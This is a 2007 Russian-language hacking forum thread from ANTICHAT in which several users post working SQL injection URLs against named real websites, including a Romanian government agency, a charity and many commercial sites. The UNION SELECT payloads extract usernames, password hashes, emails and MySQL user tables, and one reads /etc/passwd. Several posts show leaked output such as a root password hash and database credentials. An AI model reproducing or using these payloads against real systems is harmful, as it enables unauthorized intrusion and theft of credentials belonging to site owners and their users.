ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3721  
Старый 15.11.2007, 22:06
K1nD[e]R
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761

Репутация: 237
Отправить сообщение для K1nD[e]R с помощью ICQ
По умолчанию

Код:
http://www.roguegovernment.com/news.php?id=-2169+union+select+1,concat_ws(0x2F,user,password),3,4,5,6+from+mysql.user/*
root : 6aee13f5467031e6
 
Ответить с цитированием

  #3722  
Старый 15.11.2007, 22:38
MegaBits
Участник форума
Регистрация: 30.08.2006
Сообщений: 181
Провел на форуме:
1058786

Репутация: 45
По умолчанию

Таблицу подобрать несмог.
Код:
http://www.mts-press.ru/links.php?part_id=-9+union+select+database()/*
mts_pressru
4.0.26
mts_pressru@MTS-PRESS.ru
 
Ответить с цитированием

  #3723  
Старый 15.11.2007, 23:02
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию

http://www.ai-petri.com/index.php?m=34&a=register&country=-6+union+select+1,concat_ws(0x3a,Email,login,passwo rd)+from+users/*
_________________________________

http://www.t-avia.ru/index.php?_a=actions&type=article&id=-355+union+select+1,concat_ws(0x3a,user_LOGIN,user_ PASSWORD,user_EMAIL),3,4,5+from+users/*

_________________________________

http://www.saabfir.ru/index.php?m=34&a=register&country=-6+union+select+1,concat_ws(0x3a,Email,login,passwo rd)+from+users/*

_________________________________

http://www.armdecor.ru/index.php?m=29&a=register&country=-6+union+select+1,concat_ws(0x3a,Email,login,passwo rd)+from+users/*

_________________________________

http://creazionifranca.ru/index.php?m=34&a=register&country=-6+union+select+1,concat_ws(0x3a,login,password,Ema il)+from+users/*

_________________________________

http://www.papinbag.ru/index.php?m=34&a=register&country=-6+union+select+1,concat_ws(0x3a,Email,login,passwo rd)+from+users/*

_________________________________
а это виновник всего этого безобразия :-D

http://www.exs.cc/index.php?m=46&a=news&id=-471+union+select+concat(login,0x3a,password,0x3a,E mail,0x3a,Icq)+from+users+limit+1,1/*
 
Ответить с цитированием

  #3724  
Старый 16.11.2007, 00:04
KEHT33
Познающий
Регистрация: 26.11.2006
Сообщений: 49
Провел на форуме:
65459

Репутация: 79
По умолчанию

Код HTML:
http://www.fundsnetservices.com/searchresult.php?sbcat_id=-6+UNION+SELECT+1,concat(username,0x3a,password),3,4,5+from+sblnk_admin/*
БД 4
 
Ответить с цитированием

  #3725  
Старый 16.11.2007, 00:37
MegaBits
Участник форума
Регистрация: 30.08.2006
Сообщений: 181
Провел на форуме:
1058786

Репутация: 45
По умолчанию

Такое впечитление что это писал один и тот же человек...
Код:
http://www.kalendar-press.ru/links.php?part_id=-5+union+select+VERSION()/*
Код:
http://mostest.ru/links.php?part_id=-15+union+select+VERSION()/*
Код:
http://www.claycy.ru/links.php?part_id=-34+union+select+VERSION()/*
Код:
http://www.tecckom.ru/links.php?part_id=-33+union+select+VERSION()/*
Код:
http://global-star.ru/links.php?part_id=-32+union+select+VERSION()/*
Код:
http://www.antron-tek.ru/links.php?part_id=-8+union+select+aes_decrypt(aes_encrypt(version(),0x71),0x71)/*
http://www.antron-tek.ru/links.php?part_id=-8+union+select+concat_ws(0x2F,LOAD_FILE('/etc/passwd'))+from+mysql.user/*
http://www.antron-tek.ru/links.php?part_id=-8+union+select+concat_ws(0x2F,user,password)+from+mysql.user+limit+1,3/*

Последний раз редактировалось MegaBits; 16.11.2007 в 03:04..
 
Ответить с цитированием

  #3726  
Старый 16.11.2007, 02:14
KEHT33
Познающий
Регистрация: 26.11.2006
Сообщений: 49
Провел на форуме:
65459

Репутация: 79
По умолчанию

Известный канал на кабельнос телевидении TDK
5 версия БД
Код HTML:
http://www.tdktv.ru/index.php?menu=program&id=-9+UNION+SELECT+1,concat(username,0x3a,user_password,0x3a,user_icq,0x3a,user_email,0x3a,user_aim,0x3a,user_yim,0x3a,user_msnm,0x3a,user_occ),3+FROM+phpbb_users/*
ДБ 4
Код HTML:
http://www.debinnenvaart.nl/schependb/inhoud.php?action=tel&id=-6899'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,USER(),19,20,21,DATABASE(),VERSION(),24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155/*
4ДБ
нашёл только 2 таблицы news и products
Код HTML:
http://fotosale.com.ua/index.php?mod=prod&cid=1&bid=1&pid=471+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*

Последний раз редактировалось KEHT33; 16.11.2007 в 03:30..
 
Ответить с цитированием

  #3727  
Старый 16.11.2007, 13:06
KEHT33
Познающий
Регистрация: 26.11.2006
Сообщений: 49
Провел на форуме:
65459

Репутация: 79
По умолчанию

Код HTML:
http://www.animalsasia.org/index.php?module=3&menupos=10+UNION+SELECT+1,2,3,4,5,6,concat(user,0x3a,password),8,9,10,11,12,13,14+FROM+mysql.user/*
БД 4
 
Ответить с цитированием

  #3728  
Старый 16.11.2007, 13:22
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695

Репутация: 524
Отправить сообщение для fRg с помощью ICQ
По умолчанию

anad.gov.ro - Национальное Румынское Анти-допинговое Агенство
Код:
http://www.anad.gov.ro/html/ro/presa_comunicate.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6/*
5.0.32-Debian_7etch1-log:db_anad:anaddba@web1.stsisp.ro

Доступна только одна таблица :
Код:
comunicate
 
Ответить с цитированием

  #3729  
Старый 16.11.2007, 15:51
MegaBits
Участник форума
Регистрация: 30.08.2006
Сообщений: 181
Провел на форуме:
1058786

Репутация: 45
По умолчанию

Код:
http://www.kontenental.ru/index.php?page_id=-146+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16/*
5.0.27-standard
master74_setiriba
master74_setirib@localhost
Код:
http://www.kontenental.ru/index.php?page_id=-146+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,table_name),13,14,15,16+from+information_schema.tables+limit+5,10/*

Последний раз редактировалось MegaBits; 16.11.2007 в 16:28..
 
Ответить с цитированием

  #3730  
Старый 17.11.2007, 02:27
-MoLoToK-
Познающий
Регистрация: 04.10.2007
Сообщений: 32
Провел на форуме:
188171

Репутация: 88
Отправить сообщение для -MoLoToK- с помощью ICQ
По умолчанию

Ultimate Frisbee


Код:
http://www.ultimate.com.ua/ru/?g=manual&id=-1+union+select+1,2,3,4,5,version()/*
5.0.27-log

Код:
http://www.ultimate.com.ua/ru/?g=manual&id=-1+union+select+1,2,3,4,5,Table_name+from+information_schema.tables/*
есть доступ к information_schema.tables

интересные таблицы
admins
news
ULTM_players
players
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 6 (пользователей: 0 , гостей: 6)
 


Быстрый переход




ANTICHAT.XYZ